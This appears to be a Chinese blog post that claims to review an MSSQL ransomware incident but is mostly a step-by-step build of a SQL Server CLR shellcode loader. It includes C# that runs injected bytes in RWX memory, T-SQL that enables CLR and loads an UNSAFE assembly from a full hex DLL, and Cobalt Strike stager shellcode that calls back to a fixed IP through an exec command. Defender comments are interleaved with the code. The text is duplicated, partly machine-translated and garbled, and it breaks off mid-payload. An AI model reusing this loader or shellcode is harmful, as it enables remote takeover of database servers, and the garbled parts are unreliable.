背景
前几天,我处理了一起涉及 MSSQL 数据库的勒索事件,攻击者在其中很可能规避了 EDR 检测。我打算分享整个过程。
分析情况后,我发现根本原因是密码太弱,本质上是一种字典密码。黑客能够使用这个弱密码登录数据库,并注入他的 Cobalt Strike shellcode,从而完全控制 MSSQL Server。
什么是 CLR
CLR,微软正式称之为公共语言运行时,是 .NET Framework 的一个组件,自 SQL Server 2005 起已集成到 SQL Server 中。这意味着您现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和表值函数。
编译 CLR 程序集
打开 Visual Studio 安装程序并单击modify

选择Data Storage and Processing
工具

创建新项目

我的实验环境是MSSQL 2022,相关版本和脚本创建均已正确选择



完成新项目的添加后,目前的windows服务器大多运行在64位平台上,所以这里我提供了64位平台的代码
using System;
using Microsoft.SqlServer.Server;
using System.Runtime.InteropServices;
// Defender's note: this is the exact shape of the "CLR assembly loader" abuse of
// SQL Server. Once the assembly is loaded with PERMISSION_SET = UNSAFE, everything
// below runs inside sqlservr.exe, so the telemetry worth alerting on is: the
// 'clr enabled' and TRUSTWORTHY configuration changes, CREATE ASSEMBLY from a hex
// blob, and sqlservr.exe allocating executable memory and starting a thread into it.
public partial class StoredProcedures
{
// SQL-visible entry point. The argument is treated as a hex string (two characters
// per byte) and handed straight to shellcode_exec; the only thing sent back to the
// client is the empty string shellcode_exec returns.
[SqlProcedure]
public static void shellcode_loader(string sc)
{
// Place your code
SqlContext.Pipe.Send(shellcode_exec(sc));
}
// Decodes the hex string into a byte array, copies it into freshly allocated
// executable memory and starts a new thread at its first byte. Always returns "".
public static string shellcode_exec(string sc)
{
// NOTE: the listing is garbled here -- "0x40);" is the tail of the VirtualAlloc
// call further down (flProtect = 0x40, i.e. PAGE_EXECUTE_READWRITE) that the page
// wrapped onto its own line. As printed, this method does not compile.
0x40);
// Fixed 1000-byte staging buffer; the decoded input is written from index 0.
byte[] sa = new byte[1000];
// Two hex characters per byte.
int shellcode_len = sc.Length / 2;
for (int i = 0; i < shellcode_len; i++)
{
string code = "0x" + sc.Substring(i * 2, 2);
int a = Convert.ToInt32(code, 16);
sa[i] = (byte)a;
}
// 0x1000 = MEM_COMMIT. Combined with PAGE_EXECUTE_READWRITE this is the RWX
// allocation from sqlservr.exe that memory-scanning and API-hook detections key on.
UInt64 shellcodeAddress = VirtualAlloc(0, (UInt64)sa.Length, 0x1000,
Marshal.Copy(sa, 0, (IntPtr)(shellcodeAddress), sa.Length);
// Thread start address is the buffer itself. The returned handle is discarded and
// nothing waits on the thread, so the stored procedure returns immediately.
CreateThread(0, 0, shellcodeAddress, 0, 0, 0);
return "";
}
// P/Invoke declarations. Pointer/handle parameters are declared as plain integers;
// the calls above only ever pass 0 for those, which is why this happens to work.
[DllImport("kernel32")]
private static extern UInt64 VirtualAlloc(UInt64 lpAddress, UInt64 dwSize,
UInt64 flAllocationType, UInt64 flProtect);
[DllImport("kernel32")]
private static extern UInt32 CreateThread(UInt32 lpThreadAttributes, UInt32
dwStackSize, UInt64 lpStartAddress, UInt32 lpParameter, UInt32 dwCreationFlags,
UInt32 lpThreadId);
}
选择 Generate 来生成解决方案

我们将在 bin 目录中得到一个 SQL 文件

我们需要从该 SQL 文件中提取代码片段来创建程序集

执行以下 SQL 语句
-- Enables CLR integration server-wide. This is a server configuration change
-- (visible in sys.configurations) and is a standard audit/alert item for defenders.
sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO
-- TRUSTWORTHY ON on master is what lets the unsigned assembly below be created
-- with PERMISSION_SET = UNSAFE; any database with this bit set deserves review
-- (sys.databases.is_trustworthy_on).
ALTER DATABASE master SET TRUSTWORTHY ON;
GO
CREATE ASSEMBLY [MSSQL_ShellCodeLoader]
AUTHORIZATION [dbo]
FROM
0x4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000
00000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD215468
69732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2
400000000000000504500004C010300DBD669650000000000000000E00022200B013000000A000000
060000000000005E28000000200000004000000000001000200000000200000400000000000000060
000000000000000800000000200000000000003006085000010000010000000001000001000000000
00001000000000000000000000000C2800004F00000000400000D8020000000000000000000000000
00000000000006000000C000000D42600001C00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000002000000800000000000000000000000820000
04800000000000000000000002E746578740000006408000000200000000A00000002000000000000
0000000000000000200000602E72737263000000D80200000040000000040000000C0000000000000
000000000000000400000402E72656C6F6300000C0000000060000000020000001000000000000000
000000000000004000004200000000000000000000000000000000402800000000000048000000020
0050008210000CC050000010000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000004E00280500000A0228020000066F0
600000A002A133006008E000000010000110020E80300008D090000010A026F0700000A185B0B160D
2B2D0072010000700209185A186F0800000A280900000A130411041F10280A00000A130506091105D
29C000917580D0907FE04130611062DC9166A068E696A20001000006A1F406A28030000060C061608
280B00000A068E69280C00000A00161608161616280400000626720700007013072B0011072A22022
80D00000A002A0042534A4201000100000000000C00000076342E302E33303331390000000005006C
00000004020000237E0000700200009802000023537472696E677300000000080500000C000000235
553001405000010000000234755494400000024050000A800000023426C6F62000000000000000200
0001471502140900000000FA013300160000010000000D00000002000000050000000C0000000D000
000040000000100000001000000020000000100000002000000000032010100000000000600B800E0
010600D800E00106008E00AE010F0000020000060063024C010A00A20086010A00880286010A00750
086010600F6004C0106000E014C01060080024C010600A7014C0106002A01C1010000000012000000
000001000100010010000F02000015000100010050200000000096006901530001006420000000009
60030005800020000000000800091203F005D00030000000000800091205A0065000700FE20000000
008618A10106000D00000001004C00000001004C00000001004302000002000701000003007D00000
004006A0200000100200200000200FB00000003004D02000004007A01000005003302000006004F00
0900A10101001100A10106001900A1010A003100A101060039006C00100041006700150051001F012
600510015012A0051005C02300059000A003600610074023C006900930241002900A1010600200023
00A0002E000B006F002E00130078002E001B0097001A000100000107003F000100000109005A00010
0048000000000000000000000000000000000530100000400000000000000000000004A0027000000
00000400000000000000000000004A001B00000000000000006B65726E656C333200546F496E74333
2003C4D6F64756C653E0053797374656D2E44617461006D73636F726C6962007368656C6C636F6465
5F65786563005669727475616C416C6C6F63007363006C70546872656164496400437265617465546
8726561640053656E64006765745F506970650053716C5069706500666C416C6C6F636174696F6E54
7970650044656275676761626C654174747269627574650053716C50726F636564757265417474726
96275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E
74696D65436F6D7061746962696C6974794174747269627574650042797465006477537461636B536
97A6500647753697A6500537472696E6700537562737472696E67006765745F4C656E677468004D61
727368616C004D5353514C5F5368656C6C436F64654C6F616465722E646C6C0053797374656D004D5
353514C5F5368656C6C436F64654C6F61646572007368656C6C636F64655F6C6F61646572006C7050
6172616D65746572004D6963726F736F66742E53716C5365727665722E536572766572002E63746F7
200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D
652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C657
2536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573
006C70546872656164417474726962757465730064774372656174696F6E466C616773006C7041646
472657373006C7053746172744164647265737300436F6E636174004F626A65637400666C50726F74
656374006F705F4578706C6963697400436F6E766572740053716C436F6E7465787400436F7079000
005300078000001000000001899F70588C10A4B9408847FF516E94500042001010803200001052001
0111110400001221042001010E0B07081D05080B080E08020E032000080520020E08080500020E0E0
E050002080E08040001180A080004011D0508180808B77A5C561934E089040001010E0400010E0E07
00040B0B0B0B0B0900060909090B0909090801000800000000001E01000100540216577261704E6F6
E457863657074696F6E5468726F777301080100070100000000040100000000000000000000DBD669
6500000000020000001C010000F0260000F008000052534453F44668E3C2CF6F49926FADC8983C8E9
601000000453A5C6D7373716C2D70726F6A6563745C4461746162617365335C6F626A5C4465627567
5C4D5353514C5F5368656C6C436F64654C6F616465722E70646200000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000003428000000000000000000004E280000002000
00000000000000000000000000000000000000000040280000000000000000000000005F436F72446
C6C4D61696E006D73636F7265652E646C6C0000000000FF2500200010000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000010010000000180000800000000000000000000000000000010001000000300
00080000000000000000000000000000001000000000048000000584000007C020000000000000000
00007C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000
000BD04EFFE00000100000000000000000000000000000000003F0000000000000004000000020000
00000000000000000000000000440000000100560061007200460069006C00650049006E0066006F0
0000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004
DC010000010053007400720069006E006700460069006C00650049006E0066006F000000B80100000
1003000300030003000300034006200300000002C0002000100460069006C00650044006500730063
00720069007000740069006F006E000000000020000000300008000100460069006C0065005600650
07200730069006F006E000000000030002E0030002E0030002E003000000054001A00010049006E00
7400650072006E0061006C004E0061006D00650000004D005300530051004C005F005300680065006
C006C0043006F00640065004C006F0061006400650072002E0064006C006C0000002800020001004C
006500670061006C0043006F0070007900720069006700680074000000200000005C001A0001004F0
072006900670069006E0061006C00460069006C0065006E0061006D00650000004D00530053005100
4C005F005300680065006C006C0043006F00640065004C006F0061006400650072002E0064006C006
C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030
002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560
065007200730069006F006E00000030002E0030002E0030002E003000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000002000000C0000006038000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000
WITH PERMISSION_SET = UNSAFE;
GO
-- Binds a T-SQL procedure name to the CLR method, so any login with EXECUTE on
-- [dbo].[shellcode_loader] can reach it. CLR-backed procedures can be inventoried
-- via sys.assembly_modules, and UNSAFE assemblies via sys.assemblies
-- (permission_set_desc = 'UNSAFE').
CREATE PROCEDURE [dbo].[shellcode_loader]
@sc NVARCHAR (MAX)
AS EXTERNAL NAME [MSSQL_ShellCodeLoader].[StoredProcedures].[shellcode_loader]
CLR,微软正式称之为公共语言运行时,是 .NET Framework 的一个组件,自 SQL Server 2005 起已集成到 SQL Server 中。这意味着您现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和表值函数。
编译 CLR 程序集
打开 Visual Studio 安装程序并单击modify

选择Data Storage and Processing
工具

我的实验环境是MSSQL 2022,相关版本和脚本创建均已正确选择



完成新项目的添加后,目前的windows服务器大多运行在64位平台上,所以这里我提供了64位平台的代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | 使用系统; 使用 Microsoft.SqlServer.Server; 使用 System.Runtime.InteropServices; 公共部分类 StoredProcedures { [SqlProcedure] 公共静态 void shellcode_loader(string sc) { //放置您的代码 SqlContext.Pipe.Send(shellcode_exec(sc)); } 公共静态字符串 shellcode_exec(string sc) { 0x40); byte[] sa = new byte[1000]; int shellcode_len = sc.Length / 2; for (int i = 0; i < shellcode_len; i++) { string code =“0x”+sc.Substring(i * 2, 2); int a = Convert.ToInt32(code, 16); sa[i] = (byte)a; } UInt64 shellcodeAddress = VirtualAlloc(0, (UInt64)sa.Length, 0x1000, Marshal.Copy(sa, 0, (IntPtr)(shellcodeAddress), sa.Length); CreateThread(0, 0, shellcodeAddress, 0, 0, 0); 返回“”; } [DllImport(“kernel32”)] private static extern UInt64 VirtualAlloc(UInt64 lpAddress, UInt64 dwSize, UInt64 flAllocationType, UInt64 flProtect); [DllImport(“kernel32”)] private static extern UInt32 CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt64 lpStartAddress, UInt32 lpParameter, UInt32 dwCreationFlags, UInt32 lpThreadId); } |
选择 Generate 来生成解决方案

我们将在 bin 目录中得到一个 SQL 文件

执行以下 SQL 语句
-- Enables CLR integration server-wide. This is a server configuration change
-- (visible in sys.configurations) and is a standard audit/alert item for defenders.
sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO
-- TRUSTWORTHY ON on master is what lets the unsigned assembly below be created
-- with PERMISSION_SET = UNSAFE; any database with this bit set deserves review
-- (sys.databases.is_trustworthy_on).
ALTER DATABASE master SET TRUSTWORTHY ON;
GO
CREATE ASSEMBLY [MSSQL_ShellCodeLoader]
AUTHORIZATION [dbo]
FROM
0x4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000
00000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD215468
69732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2
400000000000000504500004C010300DBD669650000000000000000E00022200B013000000A000000
060000000000005E28000000200000004000000000001000200000000200000400000000000000060
000000000000000800000000200000000000003006085000010000010000000001000001000000000
00001000000000000000000000000C2800004F00000000400000D8020000000000000000000000000
00000000000006000000C000000D42600001C00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000002000000800000000000000000000000820000
04800000000000000000000002E746578740000006408000000200000000A00000002000000000000
0000000000000000200000602E72737263000000D80200000040000000040000000C0000000000000
000000000000000400000402E72656C6F6300000C0000000060000000020000001000000000000000
000000000000004000004200000000000000000000000000000000402800000000000048000000020
0050008210000CC050000010000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000004E00280500000A0228020000066F0
600000A002A133006008E000000010000110020E80300008D090000010A026F0700000A185B0B160D
2B2D0072010000700209185A186F0800000A280900000A130411041F10280A00000A130506091105D
29C000917580D0907FE04130611062DC9166A068E696A20001000006A1F406A28030000060C061608
280B00000A068E69280C00000A00161608161616280400000626720700007013072B0011072A22022
80D00000A002A0042534A4201000100000000000C00000076342E302E33303331390000000005006C
00000004020000237E0000700200009802000023537472696E677300000000080500000C000000235
553001405000010000000234755494400000024050000A800000023426C6F62000000000000000200
0001471502140900000000FA013300160000010000000D00000002000000050000000C0000000D000
000040000000100000001000000020000000100000002000000000032010100000000000600B800E0
010600D800E00106008E00AE010F0000020000060063024C010A00A20086010A00880286010A00750
086010600F6004C0106000E014C01060080024C010600A7014C0106002A01C1010000000012000000
000001000100010010000F02000015000100010050200000000096006901530001006420000000009
60030005800020000000000800091203F005D00030000000000800091205A0065000700FE20000000
008618A10106000D00000001004C00000001004C00000001004302000002000701000003007D00000
004006A0200000100200200000200FB00000003004D02000004007A01000005003302000006004F00
0900A10101001100A10106001900A1010A003100A101060039006C00100041006700150051001F012
600510015012A0051005C02300059000A003600610074023C006900930241002900A1010600200023
00A0002E000B006F002E00130078002E001B0097001A000100000107003F000100000109005A00010
0048000000000000000000000000000000000530100000400000000000000000000004A0027000000
00000400000000000000000000004A001B00000000000000006B65726E656C333200546F496E74333
2003C4D6F64756C653E0053797374656D2E44617461006D73636F726C6962007368656C6C636F6465
5F65786563005669727475616C416C6C6F63007363006C70546872656164496400437265617465546
8726561640053656E64006765745F506970650053716C5069706500666C416C6C6F636174696F6E54
7970650044656275676761626C654174747269627574650053716C50726F636564757265417474726
96275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E
74696D65436F6D7061746962696C6974794174747269627574650042797465006477537461636B536
97A6500647753697A6500537472696E6700537562737472696E67006765745F4C656E677468004D61
727368616C004D5353514C5F5368656C6C436F64654C6F616465722E646C6C0053797374656D004D5
353514C5F5368656C6C436F64654C6F61646572007368656C6C636F64655F6C6F61646572006C7050
6172616D65746572004D6963726F736F66742E53716C5365727665722E536572766572002E63746F7
200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D
652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C657
2536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573
006C70546872656164417474726962757465730064774372656174696F6E466C616773006C7041646
472657373006C7053746172744164647265737300436F6E636174004F626A65637400666C50726F74
656374006F705F4578706C6963697400436F6E766572740053716C436F6E7465787400436F7079000
005300078000001000000001899F70588C10A4B9408847FF516E94500042001010803200001052001
0111110400001221042001010E0B07081D05080B080E08020E032000080520020E08080500020E0E0
E050002080E08040001180A080004011D0508180808B77A5C561934E089040001010E0400010E0E07
00040B0B0B0B0B0900060909090B0909090801000800000000001E01000100540216577261704E6F6
E457863657074696F6E5468726F777301080100070100000000040100000000000000000000DBD669
6500000000020000001C010000F0260000F008000052534453F44668E3C2CF6F49926FADC8983C8E9
601000000453A5C6D7373716C2D70726F6A6563745C4461746162617365335C6F626A5C4465627567
5C4D5353514C5F5368656C6C436F64654C6F616465722E70646200000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000003428000000000000000000004E280000002000
00000000000000000000000000000000000000000040280000000000000000000000005F436F72446
C6C4D61696E006D73636F7265652E646C6C0000000000FF2500200010000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000010010000000180000800000000000000000000000000000010001000000300
00080000000000000000000000000000001000000000048000000584000007C020000000000000000
00007C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000
000BD04EFFE00000100000000000000000000000000000000003F0000000000000004000000020000
00000000000000000000000000440000000100560061007200460069006C00650049006E0066006F0
0000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004
DC010000010053007400720069006E006700460069006C00650049006E0066006F000000B80100000
1003000300030003000300034006200300000002C0002000100460069006C00650044006500730063
00720069007000740069006F006E000000000020000000300008000100460069006C0065005600650
07200730069006F006E000000000030002E0030002E0030002E003000000054001A00010049006E00
7400650072006E0061006C004E0061006D00650000004D005300530051004C005F005300680065006
C006C0043006F00640065004C006F0061006400650072002E0064006C006C0000002800020001004C
006500670061006C0043006F0070007900720069006700680074000000200000005C001A0001004F0
072006900670069006E0061006C00460069006C0065006E0061006D00650000004D00530053005100
4C005F005300680065006C006C0043006F00640065004C006F0061006400650072002E0064006C006
C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030
002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560
065007200730069006F006E00000030002E0030002E0030002E003000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000002000000C0000006038000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000
WITH PERMISSION_SET = UNSAFE;
GO
-- Binds a T-SQL procedure name to the CLR method, so any login with EXECUTE on
-- [dbo].[shellcode_loader] can reach it. CLR-backed procedures can be inventoried
-- via sys.assembly_modules, and UNSAFE assemblies via sys.assemblies
-- (permission_set_desc = 'UNSAFE').
CREATE PROCEDURE [dbo].[shellcode_loader]
@sc NVARCHAR (MAX)
AS EXTERNAL NAME [MSSQL_ShellCodeLoader].[StoredProcedures].[shellcode_loader]
创建存储过程
打开 MSSQL 的 CLR 功能,然后创建存储过程

在 Cobalt Strike 中使用 C 编程语言生成 shellcode

使用Python脚本转换ShellCode的格式
def hex_convert():
byte_sequence =
b'\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd
2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7
\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\
x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x
18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8
b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01
\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\
x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x
0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5
e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a
\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\
x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x
48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd
5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x4b\x1f\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a
\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\
x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\x
ff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc
0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f
\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\
x00\xe8\xa2\xff\xff\xff\x2f\x52\x4e\x50\x6d\x00\xa4\xc1\x12\x2f\x52\x7f\xda\xdb\x
19\x11\x20\x16\x2f\x85\xc8\x97\x87\xd4\xc7\xfc\x3f\x20\xb2\xc9\xed\x23\x14\x12\x0
2\x8c\x22\xcb\x04\x9c\xd3\x02\x2c\x42\x0e\xf2\xb6\x17\x2a\x11\x9d\x7b\x2e\xe0\x1b
\x52\x05\xc6\x53\x86\xca\x1e\xb6\x2c\xa0\xb2\x3d\x13\x89\x5e\x93\xf1\x03\x3b\xa5\
xf9\xce\xa4\xc8\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x
69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3
b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e
\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\
x74\x2f\x35\x2e\x30\x3b\x20\x4d\x41\x54\x50\x3b\x20\x4d\x41\x54\x50\x29\x0d\x0a\x
00\x90\x43\x13\x5b\x13\x34\x7d\x9f\x7e\x65\x68\x85\xfa\x95\xa8\xb8\xfc\x36\xec\x7
5\x24\x1d\x8f\xc5\xa4\xc7\x06\x55\x35\xf6\x14\x82\x31\x46\x25\x94\x14\x70\x7e\x49
\x9c\x0b\x3e\xef\x29\x03\xcc\x77\x72\x23\xdc\xf9\x9d\x8e\x93\x6a\xef\x36\x76\xa3\
x63\x60\xe8\x60\xb6\x8f\x08\x48\xb4\x0c\xa5\x03\x44\x0a\x4c\xb1\x36\x99\xe6\xe0\x
3c\xc7\xcc\x05\x74\x18\x49\x1a\x61\x39\xd9\x58\xe0\xbd\xdd\x74\x3a\x24\xe6\x91\xa
4\xfd\x70\xcc\xd2\xcf\x20\x76\x63\x47\xe1\x5b\x32\x34\x87\x05\x13\x6e\x4d\xd7\x21
\x29\xdc\xf6\x5b\x4a\x05\x72\xdf\xfb\xe7\xd6\x27\x04\x6a\x18\xc8\x8d\x55\x49\x43\
xae\xe8\x46\x85\x35\x43\x0a\x1f\x83\x04\x20\xba\x10\x97\xe4\x36\x3a\x0a\xac\x77\x
07\x42\x86\x17\x73\x53\x73\x3f\x0e\x0b\x5a\xd0\x6a\x03\xd6\x39\x59\xaf\x8f\xa1\x5
1\xa3\xb8\x45\xa1\x82\x26\x0e\x9d\xa7\x01\xe7\x76\x5e\x42\xb9\x4b\x14\x4c\xc8\x27
\xec\x8b\x7a\x58\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\
x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\x
d5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x4
9\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b
\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\
x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x33\x2e\x31\x33\x30\x00\x3a\xde\x
68\xb1'
convert_string = ''.join(format(byte, '02x') for byte in byte_sequence)
print(convert_string)
# Script entry point: prints the hex string that hex_convert builds from its
# embedded byte sequence (the same encoding the CLR procedure above expects).
if __name__ == '__main__':
hex_convert()

加载并执行ShellCode
exec shellcode_loader
'fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb7
4a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d06681781
80b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801
d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0
c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a
488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94
831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b84b1f00004d31c9415141516a
03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bf
fd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f
859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f524e506d00a4c1122f527fdadb1
91120162f85c89787d4c7fc3f20b2c9ed231412028c22cb049cd3022c420ef2b6172a119d7b2ee01b
5205c65386ca1eb62ca0b23d13895e93f1033ba5f9cea4c800557365722d4167656e743a204d6f7a6
96c6c612f352e302028636f6d70617469626c653b204d53494520392e303b2057696e646f7773204e
